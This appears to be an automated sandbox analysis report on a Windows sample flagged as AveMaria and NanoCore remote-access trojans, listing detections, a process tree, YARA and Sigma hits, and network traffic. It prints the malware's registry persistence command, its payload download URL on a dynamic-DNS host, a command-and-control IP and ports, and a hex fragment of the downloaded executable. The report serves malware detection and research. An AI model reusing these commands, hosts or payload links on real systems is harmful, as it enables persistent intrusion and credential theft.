Loading ...

Play interactive tourEdit tour

Windows Analysis Report Xjf4yH9N2t.exe

Overview

General Information

Sample Name:Xjf4yH9N2t.exe
Analysis ID:457791
MD5:2318b60075e442cb6141535e268e4df0
SHA1:6d2e6e0bfdb0e649e0079533ecdbe302ff9dc8b5
SHA256:cdbe67339a29bfe3066a18b4e68e9b19e28e449ab21ce23a85ed15e04c5255df
Tags:AveMariaRATexeRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore AveMaria
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Nanocore Rat
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AveMaria stealer
Yara detected Nanocore RAT
Allocates memory in foreign processes
Connects to many ports of the same IP (likely port scanning)
Contains functionality to hide user accounts
Contains functionality to inject threads in other processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal e-mail passwords
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides user accounts
Increases the number of concurrent connection per server for Internet Explorer
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Direct Autorun Keys Modification
Spawns drivers
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Xjf4yH9N2t.exe (PID: 1048 cmdline: 'C:\Users\user\Desktop\Xjf4yH9N2t.exe' MD5: 2318B60075E442CB6141535E268E4DF0)
    • Xjf4yH9N2t.exe (PID: 3468 cmdline: C:\Users\user\Desktop\Xjf4yH9N2t.exe MD5: 2318B60075E442CB6141535E268E4DF0)
    • Xjf4yH9N2t.exe (PID: 4092 cmdline: C:\Users\user\Desktop\Xjf4yH9N2t.exe MD5: 2318B60075E442CB6141535E268E4DF0)
    • Xjf4yH9N2t.exe (PID: 1380 cmdline: C:\Users\user\Desktop\Xjf4yH9N2t.exe MD5: 2318B60075E442CB6141535E268E4DF0)
      • cmd.exe (PID: 5376 cmdline: cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 4600 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe' MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • images.exe (PID: 2100 cmdline: C:\ProgramData\images.exe MD5: 2318B60075E442CB6141535E268E4DF0)
        • images.exe (PID: 2044 cmdline: C:\ProgramData\images.exe MD5: 2318B60075E442CB6141535E268E4DF0)
          • cmd.exe (PID: 5716 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • KetqqsbuJ.exe (PID: 380 cmdline: 'C:\Users\user\AppData\Roaming\KetqqsbuJ.exe' MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
            • KetqqsbuJ.exe (PID: 5916 cmdline: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
  • rdpdr.sys (PID: 4 cmdline: MD5: 52A6CC99F5934CFAE88353C47B6193E7)
  • tsusbhub.sys (PID: 4 cmdline: MD5: 3A84A09CBC42148A0C7D00B3E82517F1)
  • dhcpmon.exe (PID: 2296 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000028.00000002.483249527.0000000006C70000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x350b:$x1: NanoCore.ClientPluginHost
  • 0x3525:$x2: IClientNetworkHost
00000028.00000002.483249527.0000000006C70000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x350b:$x2: NanoCore.ClientPluginHost
  • 0x52b6:$s4: PipeCreated
  • 0x34f8:$s5: IClientLoggingHost
00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
      00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x39eb:$x1: NanoCore.ClientPluginHost
      • 0x3a24:$x2: IClientNetworkHost
      Click to see the 59 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      40.2.KetqqsbuJ.exe.6c50000.31.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x3d99:$x1: NanoCore.ClientPluginHost
      • 0x3db3:$x2: IClientNetworkHost
      40.2.KetqqsbuJ.exe.6c50000.31.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x3d99:$x2: NanoCore.ClientPluginHost
      • 0x4dce:$s4: PipeCreated
      • 0x3d86:$s5: IClientLoggingHost
      40.2.KetqqsbuJ.exe.6c70000.32.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x350b:$x1: NanoCore.ClientPluginHost
      • 0x3525:$x2: IClientNetworkHost
      40.2.KetqqsbuJ.exe.6c70000.32.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x350b:$x2: NanoCore.ClientPluginHost
      • 0x52b6:$s4: PipeCreated
      • 0x34f8:$s5: IClientLoggingHost
      40.2.KetqqsbuJ.exe.60a0000.24.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x8ba5:$x1: NanoCore.ClientPluginHost
      • 0x8bd2:$x2: IClientNetworkHost
      Click to see the 129 entries

      Sigma Overview

      AV Detection:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe, ProcessId: 5916, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      E-Banking Fraud:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe, ProcessId: 5916, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      System Summary:

      barindex
      Sigma detected: Direct Autorun Keys ModificationShow sources
      Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', CommandLine: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5376, ProcessCommandLine: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', ProcessId: 4600
      Sigma detected: Group Modification LoggingShow sources
      Source: Event LogsAuthor: Alexandr Yampolskyi, SOC Prime: Data: EventID: 4728, Source: Microsoft-Windows-Security-Auditing, data 0: -, data 1: S-1-5-21-3853321935-2125563209-4053062332-1003, data 2: None, data 3: computer, data 4: S-1-5-21-3853321935-2125563209-4053062332-513, data 5: S-1-5-21-3853321935-2125563209-4053062332-1002, data 6: user, data 7: computer, data 8: 0x190be, data 9: -
      Sigma detected: Local User CreationShow sources
      Source: Event LogsAuthor: Patrick Bareiss: Data: EventID: 4720, Source: Microsoft-Windows-Security-Auditing, data 0: jjIFKkt, data 1: computer, data 10: -, data 11: %%1793, data 12: %%1793, data 13: %%1793, data 14: %%1793, data 15: %%1793, data 16: %%1794, data 17: %%1794, data 18: 513, data 19: -, data 2: S-1-5-21-3853321935-2125563209-4053062332-1003, data 20: 0x0, data 21: 0x15, data 22: %%2080 %%2082 %%2084, data 23: %%1793, data 24: -, data 25: %%1797, data 3: S-1-5-21-3853321935-2125563209-4053062332-1002, data 4: user, data 5: computer, data 6: 0x190be, data 7: -, data 8: jjIFKkt, data 9: %%1793

      Stealing of Sensitive Information:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe, ProcessId: 5916, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Remote Access Functionality:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe, ProcessId: 5916, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for URL or domainShow sources
      Source: http://hutyrtit.ydns.eu/microC.exeAvira URL Cloud: Label: malware
      Multi AV Scanner detection for domain / URLShow sources
      Source: http://hutyrtit.ydns.eu/Virustotal: Detection: 13%Perma Link
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeReversingLabs: Detection: 19%
      Source: C:\Program Files\Microsoft DN1\sqlmap.dllMetadefender: Detection: 20%Perma Link
      Source: C:\Program Files\Microsoft DN1\sqlmap.dllReversingLabs: Detection: 42%
      Source: C:\ProgramData\images.exeReversingLabs: Detection: 19%
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\microC[1].exeReversingLabs: Detection: 19%
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeReversingLabs: Detection: 19%
      Yara detected AveMaria stealerShow sources
      Source: Yara matchFile source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248863856.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000003.295297154.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248772250.0000000000FD5000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248878230.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000003.295398863.0000000000E28000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.5264629.19.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.5260000.20.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.5260000.20.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3d08a28.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3d08a28.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3e8db04.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3d0d051.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3e88e65.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000028.00000002.476683090.0000000002CA1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.479953948.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: KetqqsbuJ.exe PID: 5916, type: MEMORYSTR
      Machine Learning detection for dropped fileShow sources
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\microC[1].exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeJoe Sandbox ML: detected
      Source: C:\ProgramData\images.exeJoe Sandbox ML: detected
      Machine Learning detection for sampleShow sources
      Source: Xjf4yH9N2t.exeJoe Sandbox ML: detected
      Source: 40.2.KetqqsbuJ.exe.5260000.20.unpackAvira: Label: TR/NanoCore.fadte
      Source: 22.2.images.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen2
      Source: 40.2.KetqqsbuJ.exe.3d08a28.9.unpackAvira: Label: TR/NanoCore.fadte
      Source: 40.2.KetqqsbuJ.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 7.2.Xjf4yH9N2t.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen2
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree,

      Compliance:

      barindex
      Detected unpacking (creates a PE file in dynamic memory)Show sources
      Source: C:\ProgramData\images.exeUnpacked PE file: 22.2.images.exe.4240000.5.unpack
      Source: Xjf4yH9N2t.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
      Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dllJump to behavior
      Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.iniJump to behavior
      Source: Xjf4yH9N2t.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Xjf4yH9N2t.exe, 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, images.exe, 00000016.00000003.295362829.0000000000E39000.00000004.00000001.sdmp
      Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Xjf4yH9N2t.exe, 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, images.exe, 00000016.00000003.295362829.0000000000E39000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: KetqqsbuJ.exe, 00000028.00000002.483106332.0000000006C00000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmp
      Source: Binary string: RfxVmt.pdb source: images.exe, 00000016.00000003.313698047.00000000049CB000.00000004.00000001.sdmp
      Source: Binary string: RfxVmt.pdbGCTL source: images.exe, 00000016.00000003.313698047.00000000049CB000.00000004.00000001.sdmp
      Source: Binary string: wuser32.pdb source: images.exe, 00000016.00000002.481006617.0000000004240000.00000040.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: KetqqsbuJ.exe, 00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: KetqqsbuJ.exe, 00000028.00000002.477157085.0000000002D0B000.00000004.00000001.sdmp
      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: KetqqsbuJ.exe, 00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmp
      Source: Binary string: wuser32.pdbUGP source: images.exe, 00000016.00000002.481006617.0000000004240000.00000040.00000001.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: KetqqsbuJ.exe, 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: KetqqsbuJ.exe, 00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmp
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00411446 FindFirstFileW,FindNextFileW,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49738 -> 203.159.80.186:8234
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49739 -> 203.159.80.186:8234
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49740 -> 203.159.80.186:8234
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49741 -> 203.159.80.186:8234
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49744 -> 203.159.80.186:8234
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49745 -> 203.159.80.186:8234
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49746 -> 203.159.80.186:8234
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49747 -> 203.159.80.186:8234
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49748 -> 203.159.80.186:8234
      Connects to many ports of the same IP (likely port scanning)Show sources
      Source: global trafficTCP traffic: 203.159.80.186 ports 8234,0,3,6,7,6703
      Uses dynamic DNS servicesShow sources
      Source: unknownDNS query: name: hhjhtggfr.duckdns.org
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0040290E URLDownloadToFileW,ShellExecuteW,
      Source: global trafficTCP traffic: 192.168.2.3:49727 -> 203.159.80.186:6703
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Mon, 02 Aug 2021 07:13:53 GMTAccept-Ranges: bytesETag: "382415f36d87d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:17:47 GMTContent-Length: 1378816Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 31 9b 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2e 14 00 00 da 00 00 00 00 00 00 06 4c 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 4b 14 00 4f 00 00 00 00 60 14 00 20 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 2c 14 00 00 20 00 00 00 2e 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 d6 00 00 00 60 14 00 00 d8 00 00 00 30 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 08 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 4b 14 00 00 00 00 00 48 00 00 00 02 00 05 00 90 30 01 00 64 ab 02 00 03 00 00 00 73 01 00 06 f4 db 03 00 c0 6f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 0
      Source: global trafficHTTP traffic detected: GET /microC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hutyrtit.ydns.euConnection: Keep-Alive
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0040290E URLDownloadToFileW,ShellExecuteW,
      Source: global trafficHTTP traffic detected: GET /microC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hutyrtit.ydns.euConnection: Keep-Alive
      Source: unknownDNS traffic detected: queries for: sdafsdffssffs.ydns.eu
      Source: KetqqsbuJ.exe, 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmpString found in binary or memory: http://google.com
      Source: images.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmpString found in binary or memory: http://hutyrtit.ydns.eu/
      Source: images.exe, 00000016.00000002.474849931.0000000000E2B000.00000004.00000020.sdmpString found in binary or memory: http://hutyrtit.ydns.eu/microC.exe
      Source: images.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmpString found in binary or memory: http://hutyrtit.ydns.eu/microC.exe=S;X
      Source: images.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmpString found in binary or memory: http://hutyrtit.ydns.eu/microC.exeASwX
      Source: images.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmpString found in binary or memory: http://hutyrtit.ydns.eu/qB
      Source: images.exe, 00000016.00000003.313221869.0000000000EB7000.00000004.00000001.sdmpString found in binary or memory: http://stascorp.comDVarFileInfo$
